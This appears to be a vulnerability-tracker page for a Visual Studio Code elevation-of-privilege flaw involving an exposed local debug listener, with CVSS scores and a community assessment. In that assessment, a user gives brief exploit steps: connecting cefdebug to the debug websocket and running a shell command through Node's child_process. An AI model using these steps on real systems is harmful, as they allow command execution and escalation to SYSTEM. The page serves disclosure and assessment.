7.8 High
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
7.2 High
CVSS2
Access Vector
LOCAL
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:L/AC:L/Au:N/C:C/I:C/A:C
An elevation of privilege vulnerability exists in Visual Studio Code when it exposes a debug listener to users of a local computer, aka ‘Visual Studio Code Elevation of Privilege Vulnerability’.
Recent assessments:
goodlandsecurity at May 20, 2020 2:28am UTC reported:
If Visual Studio code runs as Administrator, privileges can be elevated to the highest level, i.e. NT AUTHORITY\SYSTEM.
If Visual Studio Code runs as another user, command execution can be achieved as that user.
If Visual Studio Code runs in High Integrity context, any UAC settings can bypassed and can elevate from Low/Medium levels.
Linux (Article detailing the exploit):
<PORT>
<COMMAND>
Windows:
Find the debug port
cefdebug is a minimal commandline utility and/or reference code for using libwebsockets to connect to an electron/CEF/chromium debugger.
2 ./cefdebug.exe —url ws://127.0.0.1:<PORT>
/<UUID>
—code “process.mainModule.require(‘child_process’).exec(’<COMMAND>
’)”
Run cefdebug supplied with the debug websocket url and the command you want to run
Assessed Attacker Value: 5
Assessed Attacker Value: 5Assessed Attacker Value: 3
7.8 High
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
7.2 High
CVSS2
Access Vector
LOCAL
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:L/AC:L/Au:N/C:C/I:C/A:C